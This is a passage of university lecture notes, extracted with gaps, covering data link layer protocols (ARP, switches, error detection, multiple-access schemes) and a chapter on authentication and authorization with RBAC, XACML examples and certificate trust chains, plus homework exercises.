dresses. Autonomous systems consisting of non-overlapping sets of subnets have
different strategies for handling internal routing (intra-AS routing). In this way,
each autonomous system can implement their own internal routing policies and
optimize routing performance considering their own network topology. On the
other hand, a common routing protocol is needed at the borders of autonomous
systems for interoperability. The Border Gateway Protocol is the global stan-
dard of the Internet for routing packets across autonomous systems (inter-AS
routing).
5.6.1 Literature
Suggested reading
• Chapter 4 of the book Computer Networking: A Top-Down Approach by
Kurose and Ross [20, Chapter 4].
Suppose AS3 and AS2 are running OSPF for their intra-AS routing proto-
col, and AS1 and AS4 are running RIP for their intra-AS routing protocol.
Suppose eBGP and iBGP are used for the inter-AS routing protocol.
• What are the roles and working principles of hubs and switches?
100
6.1. ONE HOP DATA DELIVERY 101
Figure 6.1: Issues addressed by the data link layer. (Figure by Forouzan)
The second type is a broadcast link where the network interfaces of many
nodes (multiple senders, multiple receivers) are connected to a single shared
broadcast medium (broadcast channel). There are two famous link topologies
of a broadcast link: bus topology and star topology.
Bus Topology: In the past, the bus topology shown in Figure 6.2 was very
commonly used in local area networks (LAN). In this topology, the data
transmitted from individual nodes can ‘collide’ with each other since each
node ‘hears’ every transmission in broadcast links. This is why, a bus
topology link is said to have a single collision domain. This topology
is nowadays more often used in networks of embedded devices and in the
automotive industry (e.g. a vehicle’s steering system communicating to
the front wheels over the vehicle bus).
Star Topology: Today, the star topology shown in Figure 6.3 is very popular
as the link layer topology in computer networks. In the star topology,
there is an active entity sitting in the center, i.e. a hub or a switch, which
has a single hop network interface connection to each node. In case of
using a switch, simultaneous transmissions of different nodes are isolated
from each other by the switch via buffering. In case of using a hub in
the center, the star topology also has a single collision domain as hubs
are nothing but dumb bit repeaters. We will discuss switches and hubs in
more detail in Section 6.2, after we have introduced link layer addressing.
Remember the illustration of the comparison between the data delivery ser-
vices provided by the different protocol layers (depicted again in Figure 6.4 for
convenience). In the end-to-end path of a datagram between the source host
102 CHAPTER 6. DATA LINK LAYER
and the destination host, there can be various links of different types and with
different link layer protocols. As a result, the quality of service and even the
service types differ per link. For example, some links may be reliable while
others are not. For reliable one hop data delivery, the link layer protocol needs
to deal with duplicate frame receptions and data errors, while making sure that
the data frames are delivered to the receiver in the same order in which they are
supplied by the sender. Similarly, some links may provide a connection-oriented
service while others provide connection-less service.
Figure 6.5: Each network interface has a unique link layer address. (Figure by
Kurose and Ross)
layer addresses are considered to be static. For example, your laptop has the
same MAC address whether you are connected to your home network or to the
university network1 . In practice, the link layer address of a network interface
card can be changed in software.
Consider the delivery of a packet in the last hop before the destination host
with IP address 137.196.7.78 as depicted by Figure 6.6. A service that maps
the destination address 137.196.7.78 to the MAC address 1A-2F-BB-76-09-AD
is needed2 . In the Internet, this service (i.e. address resolution for routing in
the same subnet) is provided by the Address Resolution Protocol (ARP),
1 Note that this is different than IP addresses, where you have a different IP address in each
subnet. The first 24 bits of assigned to a manufacturers by IEEE. The remaining 24 bits are
assigned by the manufacturer to its individual products’ network interface cards.
2 Note that every IP address is mapped to a (unique) MAC address.
104 CHAPTER 6. DATA LINK LAYER
Figure 6.6: On a given link, every IP address maps to a MAC address. ARP
does the translation from IP addresses to MAC addresses. (Figure by Kurose
and Ross)
which is described in Figure 6.7. Every node maintains an ARP table, which
contains mappings from some of the IP addresses on the same subnet to their
MAC addresses, together with a TTL (Time To Live) value. TTL determines
the time until the mapping expires (i.e. taken out from the ARP table) and is
typically set to 20 minutes.
Note that the creation of ARP tables does not require any manual support
from a network administrator. The ARP table of a node is created fully auto-
matically after joining a subnet.
6.3.1 Hub
A hub is simply a repeater (indeed a physical layer device), whose task is to
forward and repeat bits coming into one of its link interfaces to all other links
connected to its remaining link interfaces. A hub works on bits, it does not
(necessarily) contain software and it does not examine frame headers. A hub
does not buffer any frames and, therefore, it does not decouple transmissions of
different senders. That means collisions can still occur in a star topology with
a hub in the center.
6.3.2 Switch
As opposed to hubs, a switch3 operates link layer frames, i.e. it examines frame
headers of incoming frames. Therefore, their operation is much more complex
than that of hubs. Switches are very often used in Ethernet links. A switch
buffers the incoming frame, and depending on the destination MAC address it
selectively forwards the frame on one or more of its link interfaces (i.e. store-
and-forward behavior).
A switch maintains a switch table in order to keep track of which MAC
addresses are reachable on each of its link interfaces. Every time the switch
receives a frame on one of its link interfaces the switch adds an entry to its
switch table mapping the source (link layer) address of the incoming frame
to the corresponding link interface4 . The switch operation is summarized in
Figure 6.8.
main difference of a router from a layer 3 switch is that a router’s operation is in software and
more dynamic, while a layer 3 switch’s operation is in hardware and faster as a result. Layer
3 switches are beyond our scope.
4 That is unless the entry already exists. Similar to the ARP table, the switch also maintains
a TTL duration with each entry, at the end of which the corresponding entry is removed from
the switch table.
106 CHAPTER 6. DATA LINK LAYER
Switches can be interconnected as shown in Figure 6.9 and the switch opera-
tion depicted in Figure 6.8 and the build-up of switch tables remain exactly the
same. See how the switch tables are built in this case in the video recording of
the lecture (slides contain an example with animations).
single bit parity and two-dimensional bit parity. Single bit parity checking can
detect all single bit errors. The parity bit aims to make the total number of 1’s
in the bit pattern even (even bit parity check) or odd (odd bit parity check).
Two-dimensional bit parity checking structures the data into rows and columns
and computes for each row and column the parity bit as it is done in single bit
parity. Two-dimensional bit parity checking can detect and correct all single
bit errors. The ability to correct is thanks to the fact that parity errors will
be detected both at the row parity and the column parity for the erroneous bit.
The only thing that is needed for correction is to flip the bit back to its original
state.
Figure 6.11: CRC bit pattern computation and an example. (Figure by Kurose
and Ross)
Now imagine listening to two lecturers at the same time in the same class-
room. That would obviously be a disaster since none of the two lectures would
be intelligible to the audience. As a result, students would learn nothing and
very valuable resources, namely, the classroom time, the students’ time and en-
ergy, as well as the lecturers’ time and energy would be wasted. Clearly, media
access control is crucial.
6.5. MEDIA ACCESS CONTROL 109
Similarly, frame collisions on a link waste channel and node resources and
ideally they should be avoided altogether. In any case, the access to shared
media must be regulated in order to prevent the situation that frame collisions
constitute the majority of the transmission time into the medium. The protocols
that regulate access to shared media are called multiple-access protocols. In
the ideal situation, a multiple access protocol should divide the channel capacity
entirely (no idle capacity) and equally among senders.
There are three classes of multiple-access protocols in the literature:
TDMA: Time is divided into periodic rounds. At each round a sender has the
right to access the link only inside its allocated fixed-length time slot. The
time slot length is typically chosen according to the transmission time of
the maximum size packet (MTU). If a sender does not use its time slot,
the slot is wasted. An example with 6 senders is shown in Figure 6.13.
5 Two signals f (t) and g(t) are mutually orthogonal to each other in the interval [0, T ] if
∫T
0 f (t)g(t)dt = 0.
110 CHAPTER 6. DATA LINK LAYER
FDMA: Fixed pieces of the total channel bandwidth are allocated to individual
senders. Whenever a sender does not send anything its frequency band
capacity is wasted. An example with 6 senders is shown in Figure 6.14.
CDMA: Each sender is assigned one of the mutually orthogonal codes, each
code used to encode bit patterns. Multiple senders can transmit their bit
patterns at the same time using the full channel bandwidth. The sum of
the multiple signals of simultaneous senders (s(t) = c1 (t)+c2 (t)+...+cN (t))
can easily be decoded at the receiving side by projecting the sum onto the
individual codes. For example, projecting s(t) onto c1 (t) over one bit
interval of length T seconds is by computing:
∫ ∫
s(t) · c1 (t)dt = (c1 (t) + c2 (t) + ... + cN (t)) · c1 (t)dt
T
∫T ∫
= c1 (t) · c1 (t)dt + ... + cN (t) · c1 (t)dt
∫T T
= c1 (t) · c1 (t)dt
T
Figure 6.15: Four orthogonal codes, each of which can be used by a different
sender. (Figure by Wikipedia)
Figure 6.16: CDMA encoding with two senders and two codes. The bottom
signal
∫ is s(t). Note that for the first sender, the results of the computation
T
s(t) · c1 (t)dt in the first, second and third bit intervals are 1, -1 and -1 Volts,
corresponding to bits∫ 1, 0 and 0 respectively. For the second sender, the results
of the computation T s(t) · c2 (t)dt in the first, second and third bit intervals
are 1, -1 and 1 Volts, corresponding to bits 1, 0 and 1 respectively.
112 CHAPTER 6. DATA LINK LAYER
ALOHA: The name was given by its designers at the University of Hawaii (a
word used for greeting in Hawaiian). In ALOHA, a sender that has data
to send immediately transmits a full link layer frame containing (part of)
the data. In case there is a collision (packet loss), the sender retransmits
the frame with the probability p after it has completely transmitted the
collided frame (waste). On the plus side, this is a decentralized protocol,
i.e. there is no central intelligence that decides who can transmit when.
However, the efficiency (probability of a successful transmission attempt)
of ALOHA is very bad, leading to a lot of retransmissions and poor perfor-
mance. ALOHA has time slotted (needs synchronization among senders)
and unslotted versions.
CSMA: Since frequent collisions kill efficiency as in the case of ALOHA, it was
necessary to develop a protocol that aims to prevent collisions. CSMA is
such a protocol “not interrupting others while they are transmitting”. The
CSMA sender listens to the channel before transmitting anything (carrier
sensing). If there is a currently ongoing transmission, the sender defers its
transmission. The operation of the CSMA sender is given in Figure 6.17.
Note that collisions can still occur with CSMA due to propagation delays
as shown in Figure 6.18. A variant of CSMA, CSMA with Collision
Detection (CSMA/CD) tries to detect collisions and quickly stops the
sender’s transmission upon collision detection (less resources wasted). The
sender can detect a collision, for example, if it is receiving another signal
while sending its own. There are many ways to detect collisions. A popular
MAC protocol that employs CSMA/CD is the Ethernet protocol.
Another variant of CSMA, CSMA with Collision Avoidance (CS-
MA/CA) does not employ collision detection. CSMA/CA proves to be
useful especially in wireless networks where collision detection is very dif-
ficult. There are two difficulties with collision detection in wireless. The
first difficulty is that the power of the received signal is usually very weak
in comparison to the power of the transmitted signal6 . Secondly, the so
6 This is as measured by the transmitter. The weakness of the received signal comes from
called hidden terminal problem depicted in Figure 6.19 can cause packet
collisions that are impossible to detect by the transmitters.
Figure 6.19: The hidden terminal problem. (Figure by Kurose and Ross)
If the channel is sensed busy, the CSMA/CA sender waits for a randomly
chosen amount of time before it tries again, which is called a ‘random
backoff’. When the backoff counter hits zero (i.e. the randomly chosen
backoff period expires), the sender ‘senses’ the channel again and transmits
its packet if the channel is not busy. If not, a new random backoff duration
is chosen (from a larger interval) and the sender waits again. This is
repeated until the receiver’s acknowledgement is received for the frame.
The CSMA/CA operation of a WiFi link (IEEE 802.11 protocol) is shown
in Figure 6.20.
Additionally, the CSMA/CA may allow (wireless) senders to reserve the
channel (instead of random access) with the purpose of eliminating colli-
sions. For this, the CSMA/CA sender transmits small Request-To-Send
(RTS) message to the wireless access point, which in return broadcasts a
114 CHAPTER 6. DATA LINK LAYER
its turn) can be increased if the sender has more data to send than others. While
idling of (rather long) time slots is a problem of TDMA, it is not a problem for
controlled-access. We will mention two taking turns protocols: i) polling, and
ii) token passing.
Token Passing: In token passing, a control token message is passed from node
to node in a logical (token) ring. The node that currently has the token
can transmit and pass the token to the next node after it’s done. Similar to
polling, the necessity to circulate the token message gives channel overhead
and latency. This time the token message itself is the single point of failure
since nodes will not transmit a token message if they have not received
one (e.g. if the token packet is lost).
6.6 Summary
The link layer is responsible for transferring a packet from one node to adjacent
node over a single link. Media access protocols govern which node on a given link
is allowed to transmit at any given time. In doing so, these protocols should
aim to utilize the channel optimally and fairly. We have seen three classes
of media access protocols: i) channel partitioning (channelization) protocols,
ii) random access protocols, and iii) controlled access protocols (taking turns).
Wireless links bring unique challenges. The reader should refer to the lecture
slides and the video recordings of the link layer lectures for a full coverage of
MAC protocols and wireless link challenges. The lecture notes are focused on
the fundamentals rather than the specific protocols. Note that TCP interprets
transmission timeouts as indicators of congestion and decreases its congestion
window size. Although this assumption is acceptable when the links are unlikely
to lose packets, when we consider very lossy wireless links on the host-to-host
path we can immediately argue that a lot of timeouts can occur due to losses
on a wireless link. For example, you may try to take your laptop to the kitchen
and download a file over WiFi while the microwave oven is on. You will see that
your wireless connection will suffer considerably since microwave ovens operate
at roughly the same frequency range with a your WiFi access point. The massive
interference from the microwave oven will cause packet losses and timeouts, and
these losses have nothing to do with packet congestion in the network core.
6.6.1 Literature
Suggested reading
2. If all the links on the end-to-end path from the source host to the des-
tination host are reliable, would that be (by itself, without using TCP)
sufficient for the reliability needs of a file transfer application? Why?
3. Assume that the sender and the receiver on a link agree on a 4-bit gener-
ator pattern, G, which is equal to 1001. The sender wants to send to the
receiver 6 bits of data, D, which is equal to 101110. Find the CRC bits R
to be appended to D. Show your work
4. Suppose nodes A and B are on the same 10 Mbps broadcast channel, and
the propagation delay between the two nodes is 325 bit times. Suppose
CSMA/CD and Ethernet packets are used for this broadcast channel (see
slides). Suppose node A begins transmitting a frame and, before it fin-
ishes, node B begins transmitting a frame. Can A finish transmitting
before it detects that B has transmitted? Why or why not? If the answer
is yes, then A incorrectly believes that its frame was successfully trans-
mitted without a collision. Hint: Suppose at time t = 0 bits, A begins
transmitting a frame. In the worst case, A transmits a minimum-sized
frame of 512 + 64 bit times. That means A would finish transmitting the
frame at t = 512 + 64 bit times. Thus, the answer is no, if B’s signal
reaches A before bit time t = 512 + 64 bits. In the worst case, when does
B’s signal reach A?
5. Consider the network depicted in the figure below. The IP addresses and
MAC addresses of individual interfaces are as denoted in the figure.
Suppose that the sender host with the IP address 111.111.111.111 wants to
send an IP datagram to the receiver host with IP address 222.222.222.222.
Answer the following questions:
(a) How many subnets are there in this network? Which IP addresses
belong to which subnet?
6.7. HOMEWORK EXERCISES 117
Authentication and
Authorization
Applications interacting with end users access resources that represent signifi-
cant value (e.g. entering a building, reading or modifying a data base, perform-
ing computations) either directly or over a network. Many security goals of a
network are thus related to access and proper use of these resources. As defined
in Chapter 1, a security policy specifies:
Enforcing the desired access control policy requires checking that an at-
tempted action on a resource is allowed for the user performing the action.
Thus we have to perform authentication; check the identity of the user (or
at least establish some properties of the user such as ‘the user is a student’)
and authorization; check the actions by the user on the resource against the
policy.
This chapter addresses the following questions:
118
7.1. ACCESS CONTROL 119
Figure 7.1: An access control matrix with five users and two resources.
lecturer maintains an online gradelist that the students can view and an online
essay submission program that the students can run’.
Recall from Chapter 1 that the meaning of a security policy is given by the
interpretation in a security model. An obvious choice for the structure of the
mathematical security model is a relation on subjects, resources and rights.
Our goal is to define access control policies which capture the meaning of
the intended high level policy by somehow specifying who (subject) is trusted
with which resource (object) to do what (allowed actions).
Figure 7.2: An RBAC policy with two roles, two resources and five users.
the class change we need to update the matrix. If Alice leaves the class we may
need to revoke her rights but how do we know that Alice had the read right
(only) because she was a student in the class?
The matrix for an entire system/network is difficult to manage. A centrally
stored matrix would create a huge bottleneck for the system/network as any
action on any resource would need to be checked at this central point. Instead
we need to distribute the storage of the matrix. The use of Access Control
Lists is one way of doing this. An AC list is basically a column from an AC
matrix, stating all the rights that different subjects have on a single resource.
As such it has a natural place to store it, i.e. together with the resource. Of
course a problem is if rights change (e.g. a student is added or removed from
the class) all relevant AC lists have to be found and updated. While this gives
a viable implementation, the maintainability only gets worse.
Finally, to use his read right Bob will have to identify himself to the system.
This should not be needed; Bob should only have to prove that he is a student
and not reveal who he is. Below we look at different mechanisms to address
these issues with the access control matrix;
level policy. It retains the notions of ‘Lecturer’ and ‘Student’ and the notion
that having one of these roles is why users obtain certain permissions.
By retaining more of the intention of the high level policy RBAC helps
improve maintainability. If Alice leaves the class all we have to change now is
the role-subject table. We do not need to manually change any rights. When
Alice tries to read Gradelist 2IC60 the system will compute her rights which, as
she is no longer a student, do not include reading this gradelist. Thus access will
be denied. If the high level policy changes and students are no longer allowed
to submit essays (for example because the deadline has passed) only this entry
in the role-resource table needs to be changed.
the same; instead of allowing action ‘read’ we could use attributes as in ‘allow
any action marked as viewing’ to allow actions read, display, print, etc. Finally
environmental conditions such as ‘during working hours’, ‘before the deadline’
can also be captured with attributes. By assigning rights to combinations of
such attributes, attribute based access control (ABAC) provides a very powerful
language for expressing access control policies.
The eXtensible Access Control Markup Language (XACML) standard de-
fines a popular ABAC language and a system/network architecture for enforce-
ment. XACML defines several components involved in the AC enforcement.
Figure 7.4 gives a (simplified) view of these components and their interaction.
The Policy Enforcement Point (PEP) is responsible for intercepting requests
and ensuring that users only get access to their allowed resources. The PEP
uses a Policy Decision Point (PDP) to determine which requests are allowed
(should be granted). The PEP gathers information about the subject and the
resource and the context in which the request is being issued (the environment)
from a Policy Information Point (PIP) and incorporates this in a request sent
to the PDP. The PDP tests the request against the set of policies that it has in
its policy store to make a decision (access granted or access denied). The PDP
can also return values indicating it is unable to make a decision: indeterminate
(some error occurred) or not-applicable (this PDP has no policies related to the
request).
A policy set contains, in addition to a list of policies1 , a combination algo-
rithm that is used to combine the different decisions of the policies in the set.
Examples are ‘first applicable’; the first policy to return a decision gets selected,
‘DENY overrides’; if a single policy causes to deny the request this is the end
decision, even if others allow the request and ‘PERMIT overrides’ where a single
permit decision overrides any other decisions.
A policy has a target determining which requests it is (or at least might
be) applicable to. The rules of the policy will be evaluated for those requests.
The rules check conditions (e.g. the issuer of the request is a student) to either
PERMIT or DENY a request. The policy also has an algorithm to combine the
1A policy list would be a better name than a policy set since the order may indeed matter.
7.1. ACCESS CONTROL 123
format. Though XML (and thus XACML) format is human readable it is not very human
friendly. Interpreting a policy can be hindered by the large amount of textual overhead.
124 CHAPTER 7. AUTHENTICATION AND AUTHORIZATION
<Request>
<Subject>
<Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:subject:subject‐id“
DataType="urn:oasis:names:tc:xacml:1.0:data‐type:rfc822Name">
<AttributeValue>[email protected]</AttributeValue>
</Attribute>
<Attribute AttributeId="group"DataType="http://www.w3.org/2001/XMLSchema#string" <Response>
Issuer="[email protected]"> <AttributeValue>developers</AttributeValue> <Result>
</Attribute>
</Subject>
<Decision>Permit</Decision>
<Resource> <Status>
<Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:resource:resource‐id" <StatusCode
DataType="http://www.w3.org/2001/XMLSchema#anyURI"> <AttributeValue> Value="urn:oasis:names:tc:xacml:1.0:status:ok"/>
http://server.example.com/code/docs/developer‐guide.html </AttributeValue> </Status>
</Attribute> </Result>
</Resource> </Response>
<Action> <Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:action:action‐id"
DataType="http://www.w3.org/2001/XMLSchema#string">
<AttributeValue>read</AttributeValue> </Attribute>
</Action>
</Request>
wants to do what (action; e.g. read) with which resource (e.g. developer guide).
It may also contain information about the environment; e.g. the request was
made from within the same office (or from within the same subnet) and during
working hours. The response contains the decision and a status code.
The XACML system is very general and by using selected sets of attributes
and formats it can model or be used in combination with other identification
and access control systems and standards. Note that XACML is attribute based
so we do not always need the identity of the user (requester, also called subject
in XACML terms). However, as the identity is just another attribute (named
‘urn:...:subject-id’) we can use it in the policy. Example: Give read access to any
one with a role attribute ‘student’ or an identity attribute ‘Jerry’ or an identity
attribute ‘Tanir’.
If Alice trusts Bob (and has his public key) than Alice can also trust state-
ments that Bob signs. The level of trust in the signed statement by Bob, i.e. his
certificate, can depend on how sure Alice is that she has Bob’s key, how strong
the signature scheme is, the level of trust in Bob and the statement that Bob is
making. For example, Bob may be an expert on baking so we will trust a bread
recipe but not a medical prescription. One may even consider the content rather
than the type of statement. For example, trust if the recipe looks ‘normal’ and
do not trust if the recipe has suspicious ingredients (e.g. asbestos).3
When Alice is not sure that the public key p is really the public key of Bob,
she cannot trust signed statements that are checked using p. When Alice and
Bob meet in person they can share their public keys. If Alice and Bob can
only communicate over an insecure channel (e.g. the Internet) and Bob send his
public key then an attacker Mallory may change it along the way. Thus Alice
needs some way of checking that the key is correct. If Alice trusts Charlie who
already knows the key of Bob then Charlie could issue a certificate stating ‘the
public key of Bob is 1234’. As the statement is signed by Charlie, Mallory can
no longer change the key without Alice noticing.
In the scenario above Alice grants Charlie the role of a Certificate Au-
thority (CA), i.e. she trusts that Charlie is an authority on the key of Bob.
How does she know Charlie is an authority? There could be another authority
Daisy that says so. How does she know Daisy is an authority on authorities?
This chain can be continued for a while but will need to end as some point at
a root CA Rob that Alice already trusts without the need for other authorities
vouching for Rob.
3 The term trust is used in many settings and in many different meanings. You will also
know the term from day to day life. Here we will focus on more technical interpretations of
the term trust [6, 13, 21] such as; a trusted statement is one which is supported by certificates.
126 CHAPTER 7. AUTHENTICATION AND AUTHORIZATION
BB 47 DE 23 5D 66 A1 72 CB C0 36 43 94 75 06 36
39 1B 82 9D 37 B8 CE 9C 3B 68 B7 FC 6A AF F1 03
D6 6E F5 A3 EF 00 1C 9B 9F C1 4D 90 A8 F2 B8 43
F5 9A 2F 83 84 B6 74 8E 81 C8 32 79 47 DF 0D D6
78 91 A4 36 84 10 F7 AC 4B D7 E7 EF 1D A3 BF CA
0A AD C9 9A E5 63 AD 01 0D 32 6D 92 35 81 1B 42
DF 75 F1 88 F6 53 D4 D8 35 B4 8B A5 87 14 5B D0
07 F0 6A 49 45 18 A6 B2 65 41 BC 5F FD 8D 60 10
D4 5B 68 04 44 43 C4 68 0F A8 3D EA E5 90 1B C0
7D E5 8E 9D F8 14 63 50 51 C9 C4 01 6D 11 FF CE
2E 4F 76 18 D0 3B 48 44 66 D8 40 A9 FB 11 04 33
4F CC 84 5E E0 01 0B 62 39 7F 43 DC EF 56 BB 50
E1 8A 99 13 52 AF B8 1B AD 7B 1F 7C 46 BD FC 31
43 27 32 D1 26 08 67 5D C9 32 7D 43 F6 DA BD 85
50 9A 6C 82 39 0E C8 92 57 56 39 3F E5 63 0A A8
D2 96 20 4A 0F 33 83 63 38 57 16 C5 47 9F 20 71
.
However, as Alice does not know TERENA CA and its keys, Alice needs
to find out whether she can trust this key and trust TERENA CA to issue
such statements. For this the TERENA CA has a certificate from another CA,
USERTrust (as shown in Figure 7.7), that validates Terena’s key and states that
TERENA is trusted to issue certificates for websites. This chain of certificates
finally ends at a root CA; a well known root of trust that Alice knows and has
the public key of (typically built into Alice’s browser and/or operating system).
A risk with this approach is that trust is full and fully transitive; the root
and intermediate CAs are trusted to only certify fully trustworthy intermediate
CAs and correctly verify the identities of all websites they issues certificates for.
However, if one step in the chain fails the whole system can break down. Several
incidents show that this can indeed happen. Hacking into the systems of the
CA is one way to obtain fake certificates.
For example:
– technet.microsoft.com/en-us/security/advisory/2798897,
– www.theregister.co.uk/2013/01/04/turkish_fake_google_site_
certificate/)
– www.comodo.com/Comodo-Fraud-Incident-2011-03-23.html
Use of outdated cryptography (such as the MD5 hash) also creates a risk; it
has been demonstrated that a fake CA certificate can be created by using MD5
hash collisions (www.win.tue.nl/hashclash/rogue-ca/, video at dewy.fem.
7.1. ACCESS CONTROL 127
Figure 7.7: The certificate for www.tue.nl that contains the public key as viewed
by the Safari web browser (the key itself not shown in the image).
tu-ilmenau.de/CCC/25C3/video_h264_720x576/25c3-3023-en-making_the_
theoretical_possible.mp4).
In HTTPS there are basically only two roles; public key holder (the website
we want to visit) and CA that certifies public keys (for anybody, anywhere). If
we want to do distributed access control we may want more roles. This would
also limit the risk with respect to the problem above; we could have different
roles such as a CA for .nl, for tue.nl, etc. Then we could trust someone for
statements about e.g. www.tue.nl without having to trust them for statements
about www.bank.com. One way of doing this is role-based trust management,
which extends the ideas of RBAC to a distributed setting.
• In RBAC we have a table which assigns roles to users. Here this is done
with a list of (simple member) rules. For example, the rule TU/e.student
← Alice gives Alice the ‘student at TU/e’ role.
7.2 Authentication
Who are you? Depending on the situation you could answer this question by
giving your name (“I’m Bob”), giving the group you belong to (“I’m a student”),
or by giving the role you are playing (e.g. “I’m the bartender”), etc. Similarly
your identity in a computer system can be a unique property of you (your user
name, bank account number, public key) and/or something you share (being
a student at the TU/e) and/or something that you are only part of the time
(being a bartender in the weekend). If we take the same perspective as in the
attribute based access control above we can answer the question ‘who are you’
with a list of attributes.
Thus you can claim that you have a certain identity (a set of attributes) but
can you prove it (how can you authenticate)? How can someone else, a verifier,
verify that you as claimant indeed have the identity (attributes) that you claim
to have. There are three types of factors that can be used for authentication:
• what you have; e.g. the key to your house, a bankcard, an OV chip card,
etc.
• what you know; e.g. the hiding place of the spare key, a security code
(pincode), a password, your mother’s maiden name, etc.
• what you are; e.g. your face which is recognized by your roommate, your
voice on the phone, your behaviour (e.g. you’re serving drinks), etc.
One can of course also combine different mechanisms, e.g. a bankcard with
a security code combines the ‘what you have’ factor with the ‘what you know’
factor. Such multi-factor authentication is often used when there are high se-
curity requirements such as for use of your bankcard which represents a large
monetary value; the level of assurance5 is matched with the requirements of the
application. By using different factors together attacks which target a single fac-
tor no longer work; e.g. pickpocketing to steal the ‘what you have’ (bankcard, a
key) is not sufficient, nor is looking over your shoulder to learn what you know
(security code, password). Both attacks have to be combined making it much
harder to perform.
We thus have the identity (such as ‘Bob’, ‘age 21’, ‘student at TU/e’) of
a claimant and ways to check this identity by a verifier; the party that checks
whether you have a certain identity, or at least have certain attributes as part
of your identity. This is similar to the bouncer at the entry of the club checking
attribute ‘age 21’. Finally, we have a relying party that offers you a service based
on your attributes (such as the bartender serving you beer.
Thus far we have discussed authentication in general, but within computer
networks we are mostly concerned with remote electronic authentication (e-
authentication) where end-users prove their attributes to an online service
using an authentication protocol. (Recall the importance of establishing at-
tributes for access control discussed in the previous section.)
The first phase in an e-authentication system is a registration process where
applicants gets issued credentials that link their identity (attributes) to tokens
(things the applicant controls). For example, Alice goes to the student regis-
tration desk and shows her passport. Then they check that Alice has paid her
tuition fees and issue Alice a student card with her picture on it. Here the
student card is a token which is linked (a credential) to the attribute ‘student
at the TU/e’ physically by the design with TU/e logo and electronically by the
same statement digitally signed by the TU/e (a certificate6 ). In this example
the TU/e asserts the student attribute. Different terms are used for the source
of attributes in different settings for example Credential Service Provider, At-
tribute Provider and Certificate authority. Different naming typically indicates
some variations in what they provide and how they provide it. We will not go
into that level of detail here. Of course how strict this registration procedure is
and how much you trust the attribute provider influence how sure you can be
about the assigned identity (level of assurance).
5 also known as level of authentication
6 Electronic credentials are usually issued in the form of certificates.
7.2. AUTHENTICATION 131
4. Level 4, the highest level, requires that registration is in person and using
a primary, government issued ID (e.g. a passport) with a picture and a
second ID (such as a verified bank account number). The registration
authority must verify the primary ID at the issuer or at other reliable
sources. Non-repudiation of the application must also be provided (e.g. by
taking a photo or fingerprint of the applicant); the applicant should not be
able to deny making the application. In the authentication phase strong
cryptographic proofs using multiple factors are needed to demonstrate
control over the token(s).
In practice, the achieved level of assurance is the highest level for which all
of the requirements are met. Thus if I use a cryptographic protocol to prove
possession of a fingerprint and pin code protected smart card but the card was
issued to me without checking who I am the assurance level is at Level 1. If I
go through a rigorous vetting procedure during registration but I use telnet to
log on (in which I ‘prove’ my identity by sending an unprotected password over
the network) not even assurance Level 1 is achieved.
Passwords - What you know Passwords are a very popular way of verifying
a claimant’s identity; they are familiar to the user and easy to implement on a
system, e.g. requiring no new hardware or complicated programming. They are
a key example of ‘what you know’ authentication. Important questions are
Finally the claimant has to tell the verifier the password. To prevent an
attacker from just trying a lot of passwords the verifier could apply a rate
limiting mechanism. After a number of incorrect entries the system could block
(or just slow down) login for that user (for some time, or until another action
is taken such as entry of a much longer PUK code for a blocked mobile phone
after three consecutive false PIN entries.)
Overall passwords form an easy to use but not very strong form of authen-
tication. Protecting high value resources with only a password is not advisable.
(See also the requirements for NIST level of assertion.)
7.3 Summary
In this chapter we have addressed (e-)authentication and authorization which
are key security issues for networked applications. If we try to express these
notions in a single sentence we could say that authentication is assigning/estab-
lishing, presenting and validating attributes of users while authorization is de-
termining and enforcing the rights of users based on their attributes. There is,
however, no clear cut line between the two as they have some inherent overlap;
both authentication and authorization deal with trust and management of at-
tributes. Authentication starts at the user; getting an identity or attributes for
a user while authorization ends at the resource; linking usage to the attributes.
Which of the steps in between, bringing user attributes and resources together,
are part of authentication and which of authorization depends on the system
and your point of view. Additionally in literature there is sometimes even more
overlap; authentication systems may talk about rights associated with the es-
tablished attributes while authorization systems may talk about obtaining the
user’s attributes. Wherever you draw the line, with both authorization (access
control) and authentication in place we have a means to link users to their rights
over a computer network.
If you wish to learn more about Access Control there is the Master course
”Principles of data protection” (2IS27). Also the Bachelors course ”Legal and
Technical Aspects of Security” (2IC70) treats access control both from a legal
and a technical perspective.
7.3.1 Literature
Suggested reading
Bob.Friends ← Alice.Friends
Bob.Friends ← Charlie
Bob.Friends ← Dave
Charlie.Friends ← Charlie.Friends.Friends
Charlie.Friends ← Alice
Dave.Friends ← Eva
4. Describe the following scenario and situations (as far as possible) using an
access control matrix, a role based access control system, RT and XACML.
A Hospital has a patient electronic health record (EHR) system. An EHR
describes the medication history of a patient. There are two possible
actions on the EHR; read the content and add a new prescription.
• The hospital has doctors Daisy and Edward, nurses Nancy and Mark
and Patients Alice, Bob and Charlie.
• Doctors are allowed to read the health records of patients.
• The doctor treating a patient is allowed to add new prescriptions and
may let a nurse read the health record of the patient.
• Daisy is treating Alice and Bob, Edward is treating Charlie.
• Nurse Nancy is assisting Daisy with the treatment of Alice.
Give a scenario in which Nancy reads the record of Alice; include the steps
involved and what happens in/with the AC system.
136 CHAPTER 7. AUTHENTICATION AND AUTHORIZATION
<Condition FunctionId="urn:oasis:names:tc:xacml:1.0:function:and">
<Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-greater-than-or-equal"
<Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-one-and-only">
<EnvironmentAttributeSelector DataType="http://www.w3.org/2001/XMLSchema#time"
AttributeId="urn:oasis:names:tc:xacml:1.0:environment:current-time"/>
</Apply>
<AttributeValue DataType="http://www.w3.org/2001/XMLSchema#time">09:00:00</AttributeValue>
</Apply>
<Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-less-than-or-equal"
<Apply FunctionId="urn:oasis:names:tc:xacml:1.0:function:time-one-and-only">
<EnvironmentAttributeSelector DataType="http://www.w3.org/2001/XMLSchema#time"
AttributeId="urn:oasis:names:tc:xacml:1.0:environment:current-time"/>
</Apply>
<AttributeValue DataType="http://www.w3.org/2001/XMLSchema#time">17:00:00</AttributeValue>
</Apply>
</Condition>
</Rule>
137
138 CHAPTER 8. NETWORK AND WEB SECURITY
